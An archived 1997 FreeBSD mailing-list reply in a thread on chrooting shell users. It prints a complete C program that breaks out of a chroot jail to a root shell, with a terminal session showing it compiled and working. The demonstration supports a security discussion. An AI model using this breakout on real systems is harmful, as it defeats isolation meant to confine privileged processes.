Date: Thu, 29 May 1997 17:40:23 -0700 From: Julian Elischer <julian@whistle.com> To: Warner Losh <imp@village.org> Cc: Terry Lambert <terry@lambert.org>, dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@FreeBSD.ORG Subject: Re: Correct way to chroot for shell account users? Message-ID: <338E21F7.446B9B3D@whistle.com> References: <199705291456.HAA03526@phaeton.artisoft.com> <E0wX6vy-0002fp-00@rover.village.org>
next in thread | previous in thread | raw e-mail | index | archive | help
Warner Losh wrote:
>
In fact here is a program to give you a root shell out of the
chroot environ..
I just tested it
it works
> Michael Smith posted the program to climb out of the jail here a few
> months ago. This isn't theoretical, but it works. It was something
> along the lines of the following. You can find it in the archives.
>
>
#include <unistd.h>
main(int argc, char **argv) {
mkdir("foo");
chroot("foo");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chroot(".");
execl("/bin/sh", "sh", NULL);
}
built1% cd /
built1% df .
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/sd0a 38991 24797 11075 69% /
built1% sudo chroot /work/julian/2.2R2
# df .
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/sd1s1f 2033631 1741315 129626 93% /work
# cd /tmp
# cat >xx.c
[type in file above]
# make xx
cc -O xx.c -o xx
# exec ./xx
# df .
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/sd0a 38991 24797 11075 69% /
# exit
built1%
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?338E21F7.446B9B3D>